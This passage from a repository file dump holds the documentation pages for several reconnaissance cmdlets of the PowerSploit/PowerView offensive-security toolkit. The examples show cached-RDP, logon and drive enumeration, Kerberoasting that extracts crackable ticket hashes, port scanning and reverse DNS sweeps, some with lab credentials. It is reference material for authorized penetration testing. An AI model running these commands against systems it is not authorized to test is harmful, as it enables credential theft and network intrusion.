    "content": "# Get-WMIRegCachedRDPConnection\r\n\r\n## SYNOPSIS\r\nReturns information about RDP connections outgoing from the local (or remote) machine.\r\n\r\nNote: This function requires administrative rights on the machine you're enumerating.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: ConvertFrom-SID\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-WMIRegCachedRDPConnection [[-ComputerName] <String[]>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nUses remote registry functionality to query all entries for the\r\n\"Windows Remote Desktop Connection Client\" on a machine, separated by\r\nuser and target server.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-WMIRegCachedRDPConnection\r\n```\r\n\r\nReturns the RDP connection client information for the local machine.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-WMIRegCachedRDPConnection  -ComputerName WINDOWS2.testlab.local\r\n```\r\n\r\nReturns the RDP connection client information for the WINDOWS2.testlab.local machine\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainComputer | Get-WMIRegCachedRDPConnection\r\n```\r\n\r\nReturns cached RDP information for all machines in the domain.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the hostname to query for cached RDP connections (also accepts IP addresses).\r\nDefaults to 'localhost'.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: Localhost\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connecting to the remote system.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.CachedRDPConnection\r\n\r\nA PSCustomObject containing the ComputerName and cached RDP information.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-WMIRegLastLoggedOn.md",
    "content": "# Get-WMIRegLastLoggedOn\r\n\r\n## SYNOPSIS\r\nReturns the last user who logged onto the local (or a remote) machine.\r\n\r\nNote: This function requires administrative rights on the machine you're enumerating.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-WMIRegLastLoggedOn [[-ComputerName] <String[]>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function uses remote registry to enumerate the LastLoggedOnUser registry key\r\nfor the local (or remote) machine.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-WMIRegLastLoggedOn\r\n```\r\n\r\nReturns the last user logged onto the local machine.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-WMIRegLastLoggedOn -ComputerName WINDOWS1\r\n```\r\n\r\nReturns the last user logged onto WINDOWS1\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainComputer | Get-WMIRegLastLoggedOn\r\n```\r\n\r\nReturns the last user logged onto all machines in the domain.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the hostname to query for remote registry values (also accepts IP addresses).\r\nDefaults to 'localhost'.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: Localhost\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connecting to the remote system.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.LastLoggedOnUser\r\n\r\nA PSCustomObject containing the ComputerName and last loggedon user.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-WMIRegMountedDrive.md",
    "content": "# Get-WMIRegMountedDrive\r\n\r\n## SYNOPSIS\r\nReturns information about saved network mounted drives for the local (or remote) machine.\r\n\r\nNote: This function requires administrative rights on the machine you're enumerating.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: ConvertFrom-SID\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-WMIRegMountedDrive [[-ComputerName] <String[]>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nUses remote registry functionality to enumerate recently mounted network drives.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-WMIRegMountedDrive\r\n```\r\n\r\nReturns the saved network mounted drives for the local machine.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local\r\n```\r\n\r\nReturns the saved network mounted drives for the WINDOWS2.testlab.local machine\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainComputer | Get-WMIRegMountedDrive\r\n```\r\n\r\nReturns the saved network mounted drives for all machines in the domain.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the hostname to query for mounted drive information (also accepts IP addresses).\r\nDefaults to 'localhost'.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: Localhost\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connecting to the remote system.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.RegMountedDrive\r\n\r\nA PSCustomObject containing the ComputerName and mounted drive information.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-WMIRegProxy.md",
    "content": "# Get-WMIRegProxy\r\n\r\n## SYNOPSIS\r\nEnumerates the proxy server and WPAD conents for the current user.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-WMIRegProxy [[-ComputerName] <String[]>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nEnumerates the proxy server and WPAD specification for the current user\r\non the local machine (default), or a machine specified with -ComputerName.\r\nIt does this by enumerating settings from\r\nHKU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-WMIRegProxy\r\n```\r\n\r\nComputerName           ProxyServer            AutoConfigURL         Wpad\r\n------------           -----------            -------------         ----\r\nWINDOWS1               http://primary.test...\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$Cred = Get-Credential \"TESTLAB\\administrator\"\r\n```\r\n\r\nGet-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local\r\n\r\nComputerName            ProxyServer            AutoConfigURL         Wpad\r\n------------            -----------            -------------         ----\r\nwindows1.testlab.local  primary.testlab.local\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the system to enumerate proxy settings on.\r\nDefaults to the local host.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: $Env:COMPUTERNAME\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connecting to the remote system.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### String\r\n\r\nAccepts one or more computer name specification strings  on the pipeline (netbios or FQDN).\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.ProxySettings\r\n\r\nOutputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Invoke-Kerberoast.md",
    "content": "# Invoke-Kerberoast\r\n\r\n## SYNOPSIS\r\nRequests service tickets for kerberoast-able accounts and returns extracted ticket hashes.\r\n\r\nAuthor: Will Schroeder (@harmj0y), @machosec  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket\r\n\r\n## SYNTAX\r\n\r\n```\r\nInvoke-Kerberoast [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>]\r\n [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]\r\n [-OutputFormat <String>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nUses Get-DomainUser to query for user accounts with non-null service principle\r\nnames (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information.\r\nThe ticket format can be specified with -OutputFormat \\<John/Hashcat\\>.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nInvoke-Kerberoast | fl\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nInvoke-Kerberoast -Domain dev.testlab.local | fl\r\n```\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\\dfm.a', $SecPassword)\r\nInvoke-Kerberoast -Credential $Cred -Verbose | fl\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nA SamAccountName (e.g.\r\nharmj0y), DistinguishedName (e.g.\r\nCN=harmj0y,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\r\nWildcards accepted.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -OutputFormat\r\nEither 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.\r\nDefaults to 'John'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Format\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: John\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.SPNTicket\r\n\r\nOutputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Invoke-Portscan.md",
    "content": "# Invoke-Portscan\r\n\r\n## SYNOPSIS\r\nSimple portscan module\r\n\r\nPowerSploit Function: Invoke-Portscan  \r\nAuthor: Rich Lundeen (http://webstersProdigy.net)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n### cmdHosts\r\n```\r\nInvoke-Portscan -Hosts <String[]> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>]\r\n [-TopPorts <String>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>]\r\n [-Threads <Int32>] [-nHosts <Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>]\r\n [-GrepOut <String>] [-XmlOut <String>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter]\r\n [-quiet] [-ForceOverwrite]\r\n```\r\n\r\n### fHosts\r\n```\r\nInvoke-Portscan -HostFile <String> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>]\r\n [-TopPorts <String>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>]\r\n [-Threads <Int32>] [-nHosts <Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>]\r\n [-GrepOut <String>] [-XmlOut <String>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter]\r\n [-quiet] [-ForceOverwrite]\r\n```\r\n\r\n## DESCRIPTION\r\nDoes a simple port scan using regular sockets, based (pretty) loosely on nmap\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nInvoke-Portscan -Hosts \"webstersprodigy.net,google.com,microsoft.com\" -TopPorts 50\r\n```\r\n\r\nDescription\r\n-----------\r\nScans the top 50 ports for hosts found for webstersprodigy.net,google.com, and microsoft.com\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\necho webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports \"80,443,8080\"\r\n```\r\n\r\nDescription\r\n-----------\r\nDoes a portscan of \"webstersprodigy.net\", and writes a greppable output file\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nInvoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet\r\n```\r\n\r\nDescription\r\n-----------\r\nScans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all file formats\r\n\r\n## PARAMETERS\r\n\r\n### -Hosts\r\nInclude these comma seperated hosts (supports IPv4 CIDR notation) or pipe them in\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: cmdHosts\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -HostFile\r\nInput hosts from file rather than commandline\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: fHosts\r\nAliases: iL\r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ExcludeHosts\r\nExclude these comma seperated hosts\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: exclude\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Ports\r\nInclude these comma seperated ports (can also be a range like 80-90)\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: p\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -PortFile\r\nInput ports from a file\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: iP\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -TopPorts\r\nInclude the x top ports - only goes to 1000, default is top 50\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ExcludedPorts\r\nExclude these comma seperated ports\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: xPorts\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SkipDiscovery\r\nTreat all hosts as online, skip host discovery\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: Pn\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -PingOnly\r\nPing scan only (disable port scan)\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: sn\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -DiscoveryPorts\r\nComma separated ports used for host discovery.\r\n-1 is a ping\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: PS\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: -1,445,80,443\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Threads\r\nnumber of max threads for the thread pool (per host)\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 100\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -nHosts\r\nnumber of hosts to concurrently scan\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 25\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Timeout\r\nTimeout time on a connection in miliseconds before port is declared filtered\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 2000\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SleepTimer\r\nWait before thread checking, in miliseconds\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 500\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SyncFreq\r\nHow often (in terms of hosts) to sync threads and flush output\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 1024\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -T\r\n\\[0-5\\] shortcut performance options.\r\nDefault is 3.\r\nhigher is more aggressive.\r\nSets (nhosts, threads,timeout)\r\n    5 {$nHosts=30;  $Threads = 1000; $Timeout = 750  }\r\n    4 {$nHosts=25;  $Threads = 1000; $Timeout = 1200 }\r\n    3 {$nHosts=20;  $Threads = 100;  $Timeout = 2500 }\r\n    2 {$nHosts=15;  $Threads = 32;   $Timeout = 3000 }\r\n    1 {$nHosts=10;  $Threads = 32;   $Timeout = 5000 }\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -GrepOut\r\nGreppable output file\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: oG\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -XmlOut\r\noutput XML file\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: oX\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ReadableOut\r\noutput file in 'readable' format\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: oN\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -AllformatsOut\r\noutput in readable (.nmap), xml (.xml), and greppable (.gnmap) formats\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: oA\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -noProgressMeter\r\nSuppresses the progress meter\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -quiet\r\nsupresses returned output and don't store hosts in memory - useful for very large scans\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: q\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ForceOverwrite\r\nForce Overwrite if output Files exist.\r\nOtherwise it throws exception\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: F\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://webstersprodigy.net](http://webstersprodigy.net)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Invoke-ReverseDnsLookup.md",
    "content": "# Invoke-ReverseDnsLookup\r\n\r\n## SYNOPSIS\r\nPerform a reverse DNS lookup scan on a range of IP addresses.\r\n\r\nPowerSploit Function: Invoke-ReverseDnsLookup  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nInvoke-ReverseDnsLookup [-IpRange] <String>\r\n```\r\n\r\n## DESCRIPTION\r\nInvoke-ReverseDnsLookup scans an IP address range for DNS PTR records.\r\nThis script is useful for performing DNS reconnaissance prior to conducting an authorized penetration test.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nInvoke-ReverseDnsLookup 74.125.228.0/29\r\n```\r\n\r\nIP              HostName\r\n--              --------\r\n74.125.228.1    iad23s05-in-f1.1e100.net\r\n74.125.228.2    iad23s05-in-f2.1e100.net\r\n74.125.228.3    iad23s05-in-f3.1e100.net\r\n74.125.228.4    iad23s05-in-f4.1e100.net\r\n74.125.228.5    iad23s05-in-f5.1e100.net\r\n74.125.228.6    iad23s05-in-f6.1e100.net\r\n\r\nDescription\r\n-----------\r\nReturns the hostnames of the IP addresses specified by the CIDR range.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nInvoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6'\r\n```\r\n\r\nIP              HostName\r\n--              --------\r\n74.125.228.1    iad23s05-in-f1.1e100.net\r\n74.125.228.4    iad23s05-in-f4.1e100.net\r\n74.125.228.5    iad23s05-in-f5.1e100.net\r\n74.125.228.6    iad23s05-in-f6.1e100.net\r\n\r\nDescription\r\n-----------\r\nReturns the hostnames of the IP addresses specified by the IP range specified.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nWrite-Output \"74.125.228.1,74.125.228.0/29\" | Invoke-ReverseDnsLookup\r\n```\r\n\r\nIP                                                          HostName\r\n--                                                          --------\r\n74.125.228.1                                                iad23s05-in-f1.1e100.net\r\n74.125.228.1                                                iad23s05-in-f1.1e100.net\r\n74.125.228.2                                                iad23s05-in-f2.1e100.net\r\n74.125.228.3                                                iad23s05-in-f3.1e100.net\r\n74.125.228.4                                                iad23s05-in-f4.1e100.net\r\n74.125.228.5                                                iad23s05-in-f5.1e100.net\r\n74.125.228.6                                                iad23s05-in-f6.1e100.net\r\n\r\nDescription\r\n-----------\r\nReturns the hostnames of the IP addresses piped from another source.\r\n\r\n## PARAMETERS\r\n\r\n### -IpRange\r\nSpecifies the IP address range.\r\nThe range provided can be in the form of a single IP address, a low-high range, or a CIDR range.\r\nComma-delimited ranges may can be provided.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.exploit-monday.com\r\nhttps://github.com/mattifestation/PowerSploit]()\r\n\r\n"
  },
  {
